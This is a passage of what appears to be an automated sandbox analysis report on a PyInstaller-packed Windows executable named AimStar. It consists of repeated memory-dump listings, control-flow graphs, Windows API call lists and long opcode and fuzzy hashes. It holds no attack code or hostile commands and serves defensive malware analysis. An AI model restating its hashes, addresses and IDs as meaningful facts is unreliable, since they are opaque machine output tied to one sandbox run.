                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                                          • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                          • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                                          • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction ID: fd07ceef45b65797b23486e0affbb32188036ea8bc2e9e3f21e6dd08f14ffbac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A12121A1B1CD4251FA60BB20E8567BAA258BF48764FC08132DA9DC27D5EE2CF50DC760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 744 7ff710f5bacc-7ff710f5baf2 745 7ff710f5bb0d-7ff710f5bb11 744->745 746 7ff710f5baf4-7ff710f5bb08 call 7ff710f54f58 call 7ff710f54f78 744->746 748 7ff710f5bee7-7ff710f5bef3 call 7ff710f54f58 call 7ff710f54f78 745->748 749 7ff710f5bb17-7ff710f5bb1e 745->749 762 7ff710f5befe 746->762 768 7ff710f5bef9 call 7ff710f5a950 748->768 749->748 751 7ff710f5bb24-7ff710f5bb52 749->751 751->748 754 7ff710f5bb58-7ff710f5bb5f 751->754 757 7ff710f5bb78-7ff710f5bb7b 754->757 758 7ff710f5bb61-7ff710f5bb73 call 7ff710f54f58 call 7ff710f54f78 754->758 760 7ff710f5bee3-7ff710f5bee5 757->760 761 7ff710f5bb81-7ff710f5bb87 757->761 758->768 765 7ff710f5bf01-7ff710f5bf18 760->765 761->760 766 7ff710f5bb8d-7ff710f5bb90 761->766 762->765 766->758 770 7ff710f5bb92-7ff710f5bbb7 766->770 768->762 773 7ff710f5bbea-7ff710f5bbf1 770->773 774 7ff710f5bbb9-7ff710f5bbbb 770->774 775 7ff710f5bbf3-7ff710f5bc1b call 7ff710f5d66c call 7ff710f5a9b8 * 2 773->775 776 7ff710f5bbc6-7ff710f5bbdd call 7ff710f54f58 call 7ff710f54f78 call 7ff710f5a950 773->776 777 7ff710f5bbbd-7ff710f5bbc4 774->777 778 7ff710f5bbe2-7ff710f5bbe8 774->778 805 7ff710f5bc1d-7ff710f5bc33 call 7ff710f54f78 call 7ff710f54f58 775->805 806 7ff710f5bc38-7ff710f5bc63 call 7ff710f5c2f4 775->806 810 7ff710f5bd70 776->810 777->776 777->778 781 7ff710f5bc68-7ff710f5bc7f 778->781 782 7ff710f5bcfa-7ff710f5bd04 call 7ff710f6398c 781->782 783 7ff710f5bc81-7ff710f5bc89 781->783 796 7ff710f5bd8e 782->796 797 7ff710f5bd0a-7ff710f5bd1f 782->797 783->782 786 7ff710f5bc8b-7ff710f5bc8d 783->786 786->782 790 7ff710f5bc8f-7ff710f5bca5 786->790 790->782 794 7ff710f5bca7-7ff710f5bcb3 790->794 794->782 799 7ff710f5bcb5-7ff710f5bcb7 794->799 801 7ff710f5bd93-7ff710f5bdb3 ReadFile 796->801 797->796 802 7ff710f5bd21-7ff710f5bd33 GetConsoleMode 797->802 799->782 804 7ff710f5bcb9-7ff710f5bcd1 799->804 807 7ff710f5bead-7ff710f5beb6 GetLastError 801->807 808 7ff710f5bdb9-7ff710f5bdc1 801->808 802->796 809 7ff710f5bd35-7ff710f5bd3d 802->809 804->782 814 7ff710f5bcd3-7ff710f5bcdf 804->814 805->810 806->781 811 7ff710f5beb8-7ff710f5bece call 7ff710f54f78 call 7ff710f54f58 807->811 812 7ff710f5bed3-7ff710f5bed6 807->812 808->807 816 7ff710f5bdc7 808->816 809->801 818 7ff710f5bd3f-7ff710f5bd61 ReadConsoleW 809->818 813 7ff710f5bd73-7ff710f5bd7d call 7ff710f5a9b8 810->813 811->810 824 7ff710f5bedc-7ff710f5bede 812->824 825 7ff710f5bd69-7ff710f5bd6b call 7ff710f54eec 812->825 813->765 814->782 823 7ff710f5bce1-7ff710f5bce3 814->823 827 7ff710f5bdce-7ff710f5bde3 816->827 819 7ff710f5bd63 GetLastError 818->819 820 7ff710f5bd82-7ff710f5bd8c 818->820 819->825 820->827 823->782 832 7ff710f5bce5-7ff710f5bcf5 823->832 824->813 825->810 827->813 834 7ff710f5bde5-7ff710f5bdf0 827->834 832->782 837 7ff710f5be17-7ff710f5be1f 834->837 838 7ff710f5bdf2-7ff710f5be0b call 7ff710f5b6e4 834->838 839 7ff710f5be9b-7ff710f5bea8 call 7ff710f5b524 837->839 840 7ff710f5be21-7ff710f5be33 837->840 843 7ff710f5be10-7ff710f5be12 838->843 839->843 844 7ff710f5be8e-7ff710f5be96 840->844 845 7ff710f5be35 840->845 843->813 844->813 848 7ff710f5be3a-7ff710f5be41 845->848 849 7ff710f5be7d-7ff710f5be88 848->849 850 7ff710f5be43-7ff710f5be47 848->850 849->844 851 7ff710f5be49-7ff710f5be50 850->851 852 7ff710f5be63 850->852 851->852 853 7ff710f5be52-7ff710f5be56 851->853 854 7ff710f5be69-7ff710f5be79 852->854 853->852 855 7ff710f5be58-7ff710f5be61 853->855 854->848 856 7ff710f5be7b 854->856 855->854 856->844
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                          • Instruction ID: e513b7bace5172dc647aefc25a027b363195179d1958c5dc7006568bbb1289f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C1B722A0CE8A52E751AB1594472BDB7B8EB81BA0FD54131EA4D03791CF7CF65DCB20

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 995526605-0
                                                                                                                                                                                                                                          • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                          • Instruction ID: 4cb4539ae922a3e53de7249358d85fd9cb5074120d151f59e427136b93f93a90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14217531A0CE4642EB10AB59F45166EE7A8FB857B0F900235EA6C837E4DE6CF449C710

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetCurrentProcess.KERNEL32 ref: 00007FF710F48780
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: OpenProcessToken.ADVAPI32 ref: 00007FF710F48793
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetTokenInformation.KERNELBASE ref: 00007FF710F487B8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetLastError.KERNEL32 ref: 00007FF710F487C2
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: GetTokenInformation.KERNELBASE ref: 00007FF710F48802
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF710F4881E
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F48760: CloseHandle.KERNEL32 ref: 00007FF710F48836
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F4916C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,00007FF710F43C55), ref: 00007FF710F49175
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                          • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                          • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                          • Instruction ID: 532235cf7e9e6ed5e2707603178fabec15aacca371d74e7af265ef332ab54cfd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09214C35A0CE4241E650BB10E9166EAA3A8EB897A0FC40031EE4D93796DF3CF849C760

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 963 7ff710f5cfd0-7ff710f5cff5 964 7ff710f5cffb-7ff710f5cffe 963->964 965 7ff710f5d2c3 963->965 967 7ff710f5d037-7ff710f5d063 964->967 968 7ff710f5d000-7ff710f5d032 call 7ff710f5a884 964->968 966 7ff710f5d2c5-7ff710f5d2d5 965->966 969 7ff710f5d06e-7ff710f5d074 967->969 970 7ff710f5d065-7ff710f5d06c 967->970 968->966 972 7ff710f5d084-7ff710f5d099 call 7ff710f6398c 969->972 973 7ff710f5d076-7ff710f5d07f call 7ff710f5c390 969->973 970->968 970->969 978 7ff710f5d1b3-7ff710f5d1bc 972->978 979 7ff710f5d09f-7ff710f5d0a8 972->979 973->972 980 7ff710f5d1be-7ff710f5d1c4 978->980 981 7ff710f5d210-7ff710f5d235 WriteFile 978->981 979->978 982 7ff710f5d0ae-7ff710f5d0b2 979->982 985 7ff710f5d1fc-7ff710f5d20e call 7ff710f5ca88 980->985 986 7ff710f5d1c6-7ff710f5d1c9 980->986 983 7ff710f5d237-7ff710f5d23d GetLastError 981->983 984 7ff710f5d240 981->984 987 7ff710f5d0b4-7ff710f5d0bc call 7ff710f54830 982->987 988 7ff710f5d0c3-7ff710f5d0ce 982->988 983->984 989 7ff710f5d243 984->989 1006 7ff710f5d1a0-7ff710f5d1a7 985->1006 990 7ff710f5d1cb-7ff710f5d1ce 986->990 991 7ff710f5d1e8-7ff710f5d1fa call 7ff710f5cca8 986->991 987->988 993 7ff710f5d0d0-7ff710f5d0d9 988->993 994 7ff710f5d0df-7ff710f5d0f4 GetConsoleMode 988->994 997 7ff710f5d248 989->997 998 7ff710f5d254-7ff710f5d25e 990->998 999 7ff710f5d1d4-7ff710f5d1e6 call 7ff710f5cb8c 990->999 991->1006 993->978 993->994 1002 7ff710f5d1ac 994->1002 1003 7ff710f5d0fa-7ff710f5d100 994->1003 1007 7ff710f5d24d 997->1007 1008 7ff710f5d2bc-7ff710f5d2c1 998->1008 1009 7ff710f5d260-7ff710f5d265 998->1009 999->1006 1002->978 1004 7ff710f5d189-7ff710f5d19b call 7ff710f5c610 1003->1004 1005 7ff710f5d106-7ff710f5d109 1003->1005 1004->1006 1013 7ff710f5d10b-7ff710f5d10e 1005->1013 1014 7ff710f5d114-7ff710f5d122 1005->1014 1006->997 1007->998 1008->966 1015 7ff710f5d267-7ff710f5d26a 1009->1015 1016 7ff710f5d293-7ff710f5d29d 1009->1016 1013->1007 1013->1014 1020 7ff710f5d124 1014->1020 1021 7ff710f5d180-7ff710f5d184 1014->1021 1022 7ff710f5d26c-7ff710f5d27b 1015->1022 1023 7ff710f5d283-7ff710f5d28e call 7ff710f54f34 1015->1023 1018 7ff710f5d2a4-7ff710f5d2b3 1016->1018 1019 7ff710f5d29f-7ff710f5d2a2 1016->1019 1018->1008 1019->965 1019->1018 1024 7ff710f5d128-7ff710f5d13f call 7ff710f63a58 1020->1024 1021->989 1022->1023 1023->1016 1029 7ff710f5d177-7ff710f5d17d GetLastError 1024->1029 1030 7ff710f5d141-7ff710f5d14d 1024->1030 1029->1021 1031 7ff710f5d16c-7ff710f5d173 1030->1031 1032 7ff710f5d14f-7ff710f5d161 call 7ff710f63a58 1030->1032 1031->1021 1034 7ff710f5d175 1031->1034 1032->1029 1036 7ff710f5d163-7ff710f5d16a 1032->1036 1034->1024 1036->1031
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D0EC
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF710F5CFBB), ref: 00007FF710F5D177
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                                                                                                                          • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction ID: 3eedf9bb8d26ca03f70764ed13259895d48c43eed860efe5441def85ab95e8fa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0391C422E1DE5185F760BF6594422BDABB8AB40BA8F944135DE0E537C5CE38F58AC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                                                                                                                          • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction ID: 57b0805b4dedd170d077c52c52f2dd55480e61956bb90982d794e7ba44127fe1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC41A422D1CB8183E710AB20A525369B274FB98774F508334E65C43BD1DF6CB6E8C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: f86debf643235593b7be9c14e733410fa1d33e0e6414d0b660a82ef33f0312fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F314B24E0CD4A41FA94BB249413BB9A7A99F82364FC41435DD4E873D7DE2CB54DC2B0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                                                          • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction ID: 4191e2bada773a23f2639e0fa446cae3cae8cf8f730384f161f1e7b338998171
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2ED09E18B1CF4A52EB183B705C9B07892696F4A761F942438D80B06393ED2CB58DC330
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction ID: 4415d54d0e9112cf570ce86f7bdd0eada1020eec1386451ce365590b03d77549
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA510721B0DE4286E624BA25940267AE6A9BF44BB4F944734FD6D077C5CF3CF609C620
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction ID: aef44f2f5366f79e8214a64a47ab3388f90d106056455035c87d1f75997280f3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7811016170CE8585DA10AB25A805169A765BB45BF4FA40331EE7E4B7E9CE3CE149C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9CE
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F62D92,?,?,?,00007FF710F62DCF,?,?,00000000,00007FF710F63295,?,?,?,00007FF710F631C7), ref: 00007FF710F5A9D8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
